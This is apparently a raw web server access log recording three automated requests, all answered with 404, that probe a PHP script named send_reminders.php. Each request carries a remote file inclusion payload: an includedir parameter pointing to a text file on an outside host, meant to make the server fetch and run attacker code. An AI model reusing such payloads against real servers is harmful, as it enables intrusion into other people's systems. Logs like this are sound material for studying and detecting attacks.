218.249.36.194 - - [20/May/2009:10:36:14 -0700] "GET /logs/access_080108.log//tools/send_reminders.php?includedir=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:36:14 -0700] "GET /tools/send_reminders.php?includedir=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:36:14 -0700] "GET /logs//tools/send_reminders.php?includedir=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
